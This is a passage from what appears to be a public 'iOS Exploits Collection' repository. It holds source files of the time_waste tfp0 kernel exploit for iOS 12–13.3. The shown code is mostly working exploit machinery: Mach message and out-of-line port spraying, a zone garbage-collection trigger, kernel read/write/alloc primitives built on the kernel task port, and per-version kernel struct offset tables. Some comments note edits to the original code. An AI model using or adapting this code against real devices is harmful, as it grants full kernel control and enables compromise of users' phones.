klist; 61 | } ip_messages; 62 | uint64_t ip_receiver; 63 | uint64_t ip_kobject; 64 | uint64_t ip_nsrequest; 65 | uint64_t ip_pdrequest; 66 | uint64_t ip_requests; 67 | uint64_t ip_premsg; 68 | uint64_t ip_context; 69 | uint32_t ip_flags; 70 | uint32_t ip_mscount; 71 | uint32_t ip_srights; 72 | uint32_t ip_sorights; 73 | } kport_t; 74 | 75 | typedef struct { 76 | struct { 77 | uint64_t data; 78 | uint32_t reserved : 24, 79 | type : 8; 80 | uint32_t pad; 81 | } lock; // mutex lock 82 | uint32_t ref_count; 83 | uint32_t active; 84 | uint32_t halting; 85 | uint32_t pad; 86 | uint64_t map; 87 | } ktask_t; 88 | 89 | #define WQT_QUEUE 0x2 90 | #define _EVENT_MASK_BITS ((sizeof(uint32_t) * 8) - 7) 91 | 92 | union waitq_flags { 93 | struct { 94 | uint32_t /* flags */ 95 | waitq_type:2, /* only public field */ 96 | waitq_fifo:1, /* fifo wakeup policy? 
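*/
            waitq_prepost:1,               /* waitq supports prepost? */
            waitq_irq:1,                   /* waitq requires interrupts disabled */
            waitq_isvalid:1,               /* waitq structure is valid */
            waitq_turnstile_or_port:1,     /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */
            waitq_eventmask:_EVENT_MASK_BITS;
    };
    uint32_t flags;
};

#endif /* exploit_h */

--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/exploit_utilities.c:
--------------------------------------------------------------------------------
//
//  exploit_utilities.c
//  sock_port
//
//  Created by Jake James on 7/17/19.
//  Copyright © 2019 Jake James. All rights reserved.
//

#import "exploit_utilities.h"

/*
 * Allocates a receive right, inserts a send right for it and raises its queue
 * limit to MACH_PORT_QLIMIT_LARGE.
 *
 * Returns the port name, or MACH_PORT_NULL if any step fails; a partially
 * set-up port is destroyed before returning.
 */
mach_port_t new_mach_port(void) {
    mach_port_t port = MACH_PORT_NULL;
    kern_return_t ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    if (ret != KERN_SUCCESS) {
        printf("[-] failed to allocate port\n");
        return MACH_PORT_NULL;
    }

    /* The original discarded this return value and re-tested the (already zero)
     * result of mach_port_allocate, so a failed insert was never detected. */
    ret = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    if (ret != KERN_SUCCESS) {
        printf("[-] failed to insert right\n");
        mach_port_destroy(mach_task_self(), port);
        return MACH_PORT_NULL;
    }

    mach_port_limits_t limits = {0};
    limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
    ret = mach_port_set_attributes(mach_task_self(), port, MACH_PORT_LIMITS_INFO,
                                   (mach_port_info_t)&limits, MACH_PORT_LIMITS_INFO_COUNT);
    if (ret != KERN_SUCCESS) {
        printf("[-] failed to increase queue limit\n");
        mach_port_destroy(mach_task_self(), port);
        return MACH_PORT_NULL;
    }

    return port;
}

/*
 * Sends `size` bytes from `buffer` as the body of a simple (non-complex)
 * message to `destination`.
 *
 * Returns KERN_SUCCESS, the mach_msg() error, or KERN_RESOURCE_SHORTAGE if
 * the message buffer could not be allocated. As in the original, a failed
 * send destroys `destination`; callers must not reuse the port after an error.
 */
kern_return_t send_message(mach_port_t destination, void *buffer, mach_msg_size_t size) {
    mach_msg_size_t msg_size = sizeof(struct simple_msg) + size;
    struct simple_msg *msg = malloc(msg_size);
    if (msg == NULL) {
        printf("[-] failed to allocate message buffer\n");
        return KERN_RESOURCE_SHORTAGE;
    }
    memset(msg, 0, sizeof(struct simple_msg));

    msg->hdr.msgh_remote_port = destination;
    msg->hdr.msgh_local_port = MACH_PORT_NULL;
    msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    msg->hdr.msgh_size = msg_size;

    memcpy(&msg->buf[0], buffer, size);

    kern_return_t ret = mach_msg(&msg->hdr, MACH_SEND_MSG, msg_size, 0, MACH_PORT_NULL,
                                 MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    free(msg);
    if (ret != KERN_SUCCESS) {
        printf("[-] failed to send message\n");
        mach_port_destroy(mach_task_self(), destination);
        return ret;
    }
    return KERN_SUCCESS;
}

/*
 * Blocks until a message with up to `size` body bytes arrives on `source`.
 *
 * Returns a malloc'd message the caller must free(), or NULL on failure.
 * The original leaked the buffer on the failure path.
 */
struct simple_msg *receive_message(mach_port_t source, mach_msg_size_t size) {
    mach_msg_size_t msg_size = sizeof(struct simple_msg) + size;
    struct simple_msg *msg = malloc(msg_size);
    if (msg == NULL) {
        printf("[-] failed to allocate message buffer\n");
        return NULL;
    }
    memset(msg, 0, sizeof(struct simple_msg));

    kern_return_t ret = mach_msg(&msg->hdr, MACH_RCV_MSG, 0, msg_size, source,
                                 MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if (ret != KERN_SUCCESS) {
        printf("[-] failed to receive message\n");
        free(msg);
        return NULL;
    }

    return msg;
}

/*
 * Sends one complex message to `where` carrying an out-of-line ports
 * descriptor holding `count` copies of `target_port` with `disposition`.
 * The fixed msgh_id 0x41414141 is kept from the original.
 *
 * Returns 0 on success, KERN_FAILURE if the send fails, or
 * KERN_RESOURCE_SHORTAGE if a buffer could not be allocated.
 */
int send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition) {
    kern_return_t ret;

    mach_port_t *ports = malloc(sizeof(mach_port_t) * count);
    struct ool_msg *msg = calloc(1, sizeof(struct ool_msg));
    if (ports == NULL || msg == NULL) {
        printf("[-] failed to allocate OOL message\n");
        free(msg);
        free(ports);
        return KERN_RESOURCE_SHORTAGE;
    }
    for (int i = 0; i < count; i++) {
        ports[i] = target_port;
    }

    msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);
    msg->hdr.msgh_remote_port = where;
    msg->hdr.msgh_local_port = MACH_PORT_NULL;
    msg->hdr.msgh_id = 0x41414141;

    msg->body.msgh_descriptor_count = 1;

    msg->ool_ports.address = ports;
    msg->ool_ports.count = count;
    msg->ool_ports.deallocate = 0;
    msg->ool_ports.disposition = disposition;
    msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
    msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;

    ret = mach_msg(&msg->hdr, MACH_SEND_MSG | MACH_MSG_OPTION_NONE, msg->hdr.msgh_size, 0,
                   MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    free(msg);
    free(ports);

    if (ret != KERN_SUCCESS) {
        printf("[-] Failed to send OOL message: 0x%x (%s)\n", ret, mach_error_string(ret));
        return KERN_FAILURE;
    }

    return 0;
}

// Ian Beer
/* Maps a kalloc size to a message size; the 3/4 factor and 0x74 are carried over unchanged from the original. */
mach_msg_size_t message_size_for_kalloc_size(mach_msg_size_t kalloc_size) {
    return ((3 * kalloc_size) / 4) - 0x74;
}

/*
 * Allocates ports and queues one large message on each until a single
 * allocate+send takes more than 1,000,000 mach_absolute_time units, then
 * destroys the ports created so far and yields. The threshold is a heuristic
 * inherited from the original, not a documented interface.
 */
void trigger_gc(void) {
    enum { gc_ports_cnt = 1000 };   /* a true constant: the original `const int` made this a VLA that clang only folds as an extension */
    int gc_ports_max = gc_ports_cnt;
    mach_port_t gc_ports[gc_ports_cnt] = { 0 };

    uint32_t body_size = (uint32_t)message_size_for_kalloc_size(16384) - sizeof(struct simple_msg); // 1024
    uint8_t *body = (uint8_t *)malloc(body_size);
    if (body == NULL) {
        printf("[-] failed to allocate gc message body\n");
        return;
    }
    memset(body, 0x41, body_size);

    for (int i = 0; i < gc_ports_cnt; i++) {
        uint64_t t0 = mach_absolute_time();

        gc_ports[i] = new_mach_port();
        send_message(gc_ports[i], body, body_size);

        uint64_t t1 = mach_absolute_time();

        if (t1 - t0 > 1000000) {
            printf("[+] got gc at %d -- breaking\n", i);
            gc_ports_max = i;   /* note: port i itself is left alive, as in the original */
            break;
        }
    }

    for (int i = 0; i < gc_ports_max; i++) {
        mach_port_destroy(mach_task_self(), gc_ports[i]);
    }

    free(body);   /* the original never released this buffer */
    sched_yield();
    sleep(1);
}

--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/exploit_utilities.h:
--------------------------------------------------------------------------------
//
//  exploit_utilities.h
//  sock_port
//
//  Created by Jake James on 7/17/19.
//  Copyright © 2019 Jake James. All rights reserved.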
7 | // 8 | 9 | #ifndef exploit_utilities_h 10 | #define exploit_utilities_h 11 | 12 | #import 13 | #import 14 | #import 15 | #import 16 | #import 17 | #import 18 | #import 19 | #import 20 | 21 | #import "IOSurface_stuff.h" 22 | 23 | struct ool_msg { 24 | mach_msg_header_t hdr; 25 | mach_msg_body_t body; 26 | mach_msg_ool_ports_descriptor_t ool_ports; 27 | }; 28 | 29 | struct simple_msg { 30 | mach_msg_header_t hdr; 31 | char buf[0]; 32 | }; 33 | 34 | typedef struct { 35 | mach_msg_bits_t msgh_bits; 36 | mach_msg_size_t msgh_size; 37 | uint64_t msgh_remote_port; 38 | uint64_t msgh_local_port; 39 | mach_port_name_t msgh_voucher_port; 40 | mach_msg_id_t msgh_id; 41 | } kern_mach_msg_header_t; 42 | 43 | struct ool_kmsg { 44 | kern_mach_msg_header_t hdr; 45 | mach_msg_body_t body; 46 | mach_msg_ool_ports_descriptor_t ool_ports; 47 | }; 48 | 49 | struct simple_kmsg { 50 | kern_mach_msg_header_t hdr; 51 | char buf[0]; 52 | }; 53 | 54 | mach_port_t new_mach_port(void); 55 | kern_return_t send_message(mach_port_t destination, void *buffer, mach_msg_size_t size); 56 | struct simple_msg* receive_message(mach_port_t source, mach_msg_size_t size); 57 | int send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition); 58 | 59 | mach_msg_size_t message_size_for_kalloc_size(mach_msg_size_t kalloc_size); 60 | void trigger_gc(void); 61 | 62 | #endif /* exploit_utilities_h */ 63 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/kernel_memory.c: -------------------------------------------------------------------------------- 1 | // 2 | // kernel_memory.c 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/18/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 
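//

#import "kernel_memory.h"

/* Kernel task port and the kernel address of our own task port; both set by init_kernel_memory(). */
static mach_port_t tfpzero;
static uint64_t task_self;

/*
 * Records the kernel task port and the kernel address of this task's port.
 * Must be called before any other function in this file.
 */
void init_kernel_memory(mach_port_t tfp0, uint64_t our_port_addr) {
    tfpzero = tfp0;
    task_self = our_port_addr;
}

/* Allocates `size` bytes in the kernel map; returns 0 if the allocation fails. */
uint64_t kalloc(vm_size_t size) {
    mach_vm_address_t address = 0;
    mach_vm_allocate(tfpzero, (mach_vm_address_t *)&address, size, VM_FLAGS_ANYWHERE);
    return address;
}

/* Releases a region previously obtained from kalloc(). */
void kfree(mach_vm_address_t address, vm_size_t size) {
    mach_vm_deallocate(tfpzero, address, size);
}

/*
 * Copies `size` bytes of kernel memory at `where` into `p`, in chunks of at
 * most 2048 bytes.
 *
 * Returns the number of bytes actually copied; this is less than `size` when
 * a chunk read fails or returns zero bytes.
 */
size_t kread(uint64_t where, void *p, size_t size) {
    size_t offset = 0;
    while (offset < size) {
        mach_vm_size_t sz = 0;
        mach_vm_size_t chunk = 2048;
        if (chunk > size - offset) {
            chunk = size - offset;
        }
        kern_return_t rv = mach_vm_read_overwrite(tfpzero, where + offset, chunk,
                                                  (mach_vm_address_t)p + offset, &sz);
        if (rv != KERN_SUCCESS || sz == 0) {
            printf("[-] error on kread(0x%016llx)\n", where);
            break;
        }
        offset += sz;
    }
    return offset;
}

/* Reads a 32-bit value; yields 0 rather than an indeterminate value if the read fails. */
uint32_t rk32(uint64_t where) {
    uint32_t out = 0;
    kread(where, &out, sizeof(uint32_t));
    return out;
}

/* Reads a 64-bit value; yields 0 rather than an indeterminate value if the read fails. */
uint64_t rk64(uint64_t where) {
    uint64_t out = 0;
    kread(where, &out, sizeof(uint64_t));
    return out;
}

/*
 * Writes `size` bytes from `p` to kernel memory at `where`, in chunks of at
 * most 2048 bytes. Returns the number of bytes written before the first failure.
 */
size_t kwrite(uint64_t where, const void *p, size_t size) {
    size_t offset = 0;
    while (offset < size) {
        size_t chunk = 2048;
        if (chunk > size - offset) {
            chunk = size - offset;
        }
        kern_return_t rv = mach_vm_write(tfpzero, where + offset, (mach_vm_offset_t)p + offset, (int)chunk);
        if (rv != KERN_SUCCESS) {
            printf("[-] error on kwrite(0x%016llx)\n", where);
            break;
        }
        offset += chunk;
    }
    return offset;
}

void wk32(uint64_t where, uint32_t what) {
    uint32_t _what = what;
    kwrite(where, &_what, sizeof(uint32_t));
}

void wk64(uint64_t where, uint64_t what) {
    uint64_t _what = what;
    kwrite(where, &_what, sizeof(uint64_t));
}

/*
 * strlen() over kernel memory, reading one byte at a time.
 * Returns 0 for a NULL address. A failed read terminates the scan; the
 * original kept looping on the stale byte, which could spin forever.
 */
unsigned long kstrlen(uint64_t string) {
    if (!string) return 0;

    unsigned long len = 0;
    char ch = 0;
    while (true) {
        if (kread(string + len, &ch, 1) != 1) break;
        if (!ch) break;
        len++;
    }
    return len;
}

/*
 * Compares two NUL-terminated strings that both live in kernel memory.
 * Returns the strcmp() result, or -1 if a local buffer could not be
 * allocated (nonzero, so a failed compare is never reported as a match).
 */
int kstrcmp(uint64_t string1, uint64_t string2) {
    unsigned long len1 = kstrlen(string1);
    unsigned long len2 = kstrlen(string2);

    /* +1 and an explicit terminator: the original allocated exactly len bytes
     * and never wrote a NUL, so strcmp() read past the end of both buffers. */
    char *s1 = malloc(len1 + 1);
    char *s2 = malloc(len2 + 1);
    if (s1 == NULL || s2 == NULL) {
        printf("[-] kstrcmp: allocation failed\n");
        free(s1);
        free(s2);
        return -1;
    }
    kread(string1, s1, len1);
    kread(string2, s2, len2);
    s1[len1] = '\0';
    s2[len2] = '\0';

    int ret = strcmp(s1, s2);
    free(s1);
    free(s2);

    return ret;
}

/*
 * Compares a kernel-memory string with a userland string.
 * Returns the strcmp() result, or -1 if the local buffer could not be allocated.
 */
int kstrcmp_u(uint64_t string1, char *string2) {
    unsigned long len1 = kstrlen(string1);

    char *s1 = malloc(len1 + 1);
    if (s1 == NULL) {
        printf("[-] kstrcmp_u: allocation failed\n");
        return -1;
    }
    kread(string1, s1, len1);
    s1[len1] = '\0';

    int ret = strcmp(s1, string2);
    free(s1);

    return ret;
}

/*
 * Resolves a Mach port name in this task to the kernel address of its
 * ipc_port by following task_self -> task -> itk_space -> is_table with the
 * offsets from offsets.h. The 0x18-byte entry stride is hard-coded as in the
 * original.
 */
uint64_t find_port(mach_port_name_t port) {
    uint64_t task_addr = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));
    uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));

    uint32_t port_index = port >> 8;   /* the table index lives in the upper bits of the port name */
    const int sizeof_ipc_entry_t = 0x18;

    uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t));

    return port_addr;
}

--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/kernel_memory.h:
--------------------------------------------------------------------------------
//
//  kernel_memory.h
//  sock_port
//
//  Created by Jake James on 7/18/19.
//  Copyright © 2019 Jake James. All rights reserved.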
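//

#ifndef kernel_memory_h
#define kernel_memory_h

/* The four system header names below were lost in extraction; only the project header survived. */
#import
#import
#import
#import
#import "offsets.h"

/* Prototypes for the mach_vm_* MIG routines, redeclared here — presumably because
 * the iOS SDK ships no public header for them; confirm against the build. */
kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);
kern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);
kern_return_t mach_vm_map(vm_map_t target_task, mach_vm_address_t *address, mach_vm_size_t size, mach_vm_offset_t mask, int flags, mem_entry_name_port_t object, memory_object_offset_t offset, boolean_t copy, vm_prot_t cur_protection, vm_prot_t max_protection, vm_inherit_t inheritance);
kern_return_t mach_vm_region_recurse(vm_map_t target_task, mach_vm_address_t *address, mach_vm_size_t *size, natural_t *nesting_depth, vm_region_recurse_info_t info, mach_msg_type_number_t *infoCnt);

/* Must be called once, with the kernel task port and the kernel address of our
 * own task port, before any accessor below is used. */
void init_kernel_memory(mach_port_t tfp0, uint64_t our_port_addr);

/* Chunked kernel reads; kread returns the number of bytes copied. */
size_t kread(uint64_t where, void *p, size_t size);
uint32_t rk32(uint64_t where);
uint64_t rk64(uint64_t where);

/* Chunked kernel writes; kwrite returns the number of bytes written. */
size_t kwrite(uint64_t where, const void *p, size_t size);
void wk32(uint64_t where, uint32_t what);
void wk64(uint64_t where, uint64_t what);

void kfree(mach_vm_address_t address, vm_size_t size);
uint64_t kalloc(vm_size_t size);

/* strcmp()/strlen() equivalents for NUL-terminated strings in kernel memory. */
int kstrcmp(uint64_t string1, uint64_t string2);
int kstrcmp_u(uint64_t string1, char *string2);
unsigned long kstrlen(uint64_t string);

/* Kernel address of the ipc_port behind a port name in this task. */
uint64_t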
find_port(mach_port_name_t port); 44 | 45 | #endif /* kernel_memory_h */ 46 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // time_waste 4 | // 5 | // Created by Jake James on 2/22/20. 6 | // Copyright © 2020 Jake James. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | NSString * appDelegateClassName; 14 | @autoreleasepool { 15 | // Setup code that might create autoreleased objects goes here. 16 | appDelegateClassName = NSStringFromClass([AppDelegate class]); 17 | } 18 | return UIApplicationMain(argc, argv, nil, appDelegateClassName); 19 | } 20 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/offsets.h: -------------------------------------------------------------------------------- 1 | enum kstruct_offset { 2 | /* struct task */ 3 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 4 | KSTRUCT_OFFSET_TASK_REF_COUNT, 5 | KSTRUCT_OFFSET_TASK_ACTIVE, 6 | KSTRUCT_OFFSET_TASK_VM_MAP, 7 | KSTRUCT_OFFSET_TASK_NEXT, 8 | KSTRUCT_OFFSET_TASK_PREV, 9 | KSTRUCT_OFFSET_TASK_ITK_SELF, 10 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 11 | KSTRUCT_OFFSET_TASK_BSD_INFO, 12 | 13 | /* struct ipc_port */ 14 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 15 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 16 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 17 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 18 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 19 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 20 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 21 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 22 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 23 | 24 | /* struct proc */ 25 | KSTRUCT_OFFSET_PROC_TASK, 26 | KSTRUCT_OFFSET_PROC_PID, 27 | KSTRUCT_OFFSET_PROC_P_FD, 28 | 29 | /* struct filedesc 
*/ 30 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES, 31 | 32 | /* struct fileproc */ 33 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB, 34 | 35 | /* struct fileglob */ 36 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA, 37 | 38 | /* struct socket */ 39 | KSTRUCT_OFFSET_SOCKET_SO_PCB, 40 | 41 | /* struct pipe */ 42 | KSTRUCT_OFFSET_PIPE_BUFFER, 43 | 44 | /* struct ipc_space */ 45 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE, 46 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 47 | KSTRUCT_OFFSET_IPC_SPACE_IS_TASK, 48 | 49 | KFREE_ADDR_OFFSET, 50 | 51 | IOSURFACE_CREATE_OUTSIZE, 52 | 53 | OFFSET_GETFI, 54 | }; 55 | 56 | int koffset(enum kstruct_offset offset); 57 | int init_offsets(void); 58 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/offsets.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | 4 | #import 5 | #import 6 | #import 7 | #import 8 | #import 9 | 10 | #import "offsets.h" 11 | 12 | #define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame) 13 | #define SYSTEM_VERSION_GREATER_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedDescending) 14 | #define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedAscending) 15 | #define SYSTEM_VERSION_LESS_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedAscending) 16 | #define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedDescending) 17 | 18 | int* offsets = NULL; 19 | 20 | int kstruct_offsets_13_0[] = { 21 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 22 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 23 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 24 | 0x28, // 
KSTRUCT_OFFSET_TASK_VM_MAP, 25 | 0x30, // KSTRUCT_OFFSET_TASK_NEXT, 26 | 0x38, // KSTRUCT_OFFSET_TASK_PREV, 27 | 0x108, // KSTRUCT_OFFSET_TASK_ITK_SELF, 28 | 0x320, // KSTRUCT_OFFSET_TASK_ITK_SPACE, 29 | 30 | #if __arm64e__ 31 | 0x388, // KSTRUCT_OFFSET_TASK_BSD_INFO, 32 | #else 33 | 0x380, // KSTRUCT_OFFSET_TASK_BSD_INFO, 34 | #endif 35 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 36 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 37 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 38 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 39 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 40 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 41 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 42 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 43 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 44 | 45 | 0x10, // KSTRUCT_OFFSET_PROC_TASK, 46 | 0x68, // KSTRUCT_OFFSET_PROC_PID, 47 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD 48 | 49 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES 50 | 51 | 0x10, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB 52 | 53 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA 54 | 55 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB 56 | 57 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER 58 | 59 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE 60 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE 61 | 0x28, // KSTRUCT_OFFSET_IPC_SPACE_IS_TASK 62 | 63 | 0x7c, // KFREE_ADDR_OFFSET 64 | 65 | 0xdd0, // IOSURFACE_CREATE_OUTSIZE 66 | 67 | 0xb8, // getExternalTrapForIndex 68 | }; 69 | 70 | int kstruct_offsets_12_0[] = { 71 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 72 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 73 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 74 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP, 75 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT, 76 | 0x30, // KSTRUCT_OFFSET_TASK_PREV, 77 | 0xd8, // KSTRUCT_OFFSET_TASK_ITK_SELF, 78 | 0x300, // KSTRUCT_OFFSET_TASK_ITK_SPACE, 79 | 80 | #if __arm64e__ 81 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO, 82 | #else 83 | 0x358, // KSTRUCT_OFFSET_TASK_BSD_INFO, 84 | #endif 85 | 0x0, // 
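// KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
    0x4,    // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
    0x40,   // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
    0x50,   // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
    0x60,   // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
    0x68,   // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
    0x88,   // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
    0x90,   // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
    0xa0,   // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

    0x10,   // KSTRUCT_OFFSET_PROC_TASK,
    0x60,   // KSTRUCT_OFFSET_PROC_PID,
    0x100,  // KSTRUCT_OFFSET_PROC_P_FD

    0x0,    // KSTRUCT_OFFSET_FILEDESC_FD_OFILES

    0x10,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB

    0x38,   // KSTRUCT_OFFSET_FILEGLOB_FG_DATA

    0x10,   // KSTRUCT_OFFSET_SOCKET_SO_PCB

    0x10,   // KSTRUCT_OFFSET_PIPE_BUFFER

    0x14,   // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
    0x20,   // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
    0x28,   // KSTRUCT_OFFSET_IPC_SPACE_IS_TASK

    0x7c,   // KFREE_ADDR_OFFSET

    0xdd0,  // IOSURFACE_CREATE_OUTSIZE

    0xb7,   // getExternalTrapForIndex
};

/*
 * Returns the entry for `offset` from the table selected by init_offsets(),
 * or 0 with a diagnostic if no table has been selected yet.
 */
int koffset(enum kstruct_offset offset) {
    if (offsets == NULL) {
        printf("[-] Please call init_offsets() prior to querying offsets\n");
        return 0;
    }
    return offsets[offset];
}

uint32_t create_outsize;

/*
 * Selects the offset table matching the running iOS version.
 *
 * Returns 0 on success, 1 if the version is above 13.3, or 2 if it is below
 * 12.0 (the lowest version for which a table exists).
 */
int init_offsets(void) {
    if (SYSTEM_VERSION_GREATER_THAN(@"13.3")) {
        printf("[-] iOS version too high, 13.3 or lower required\n");
        return 1;
    }
    else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@"13.0")) {
        printf("[i] Offsets selected for iOS 13.0 or above\n");
        offsets = kstruct_offsets_13_0;
        return 0;
    }
    else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@"12.0")) {
        printf("[i] Offsets selected for iOS 12.0 or above\n");
        offsets = kstruct_offsets_12_0;
        return 0;
    }
    else {
        /* The branch above accepts 12.0+, so 12.0 is the real lower bound; the original message said 13.0. */
        printf("[-] iOS version too low, 12.0 or higher required\n");
        return 2;
    }
}

--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_wasteTests/Info.plist:
--------------------------------------------------------------------------------




CFBundleDevelopmentRegion
$(DEVELOPMENT_LANGUAGE)
CFBundleExecutable
$(EXECUTABLE_NAME)
CFBundleIdentifier
$(PRODUCT_BUNDLE_IDENTIFIER)
CFBundleInfoDictionaryVersion
6.0
CFBundleName
$(PRODUCT_NAME)
CFBundlePackageType
$(PRODUCT_BUNDLE_PACKAGE_TYPE)
CFBundleShortVersionString
1.0
CFBundleVersion
1


--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_wasteTests/time_wasteTests.m:
--------------------------------------------------------------------------------
//
//  time_wasteTests.m
//  time_wasteTests
//
//  Created by Jake James on 2/22/20.
//  Copyright © 2020 Jake James. All rights reserved.
//

#import

@interface time_wasteTests : XCTestCase

@end

@implementation time_wasteTests

- (void)setUp {
    // Put setup code here. This method is called before the invocation of each test method in the class.
}

- (void)tearDown {
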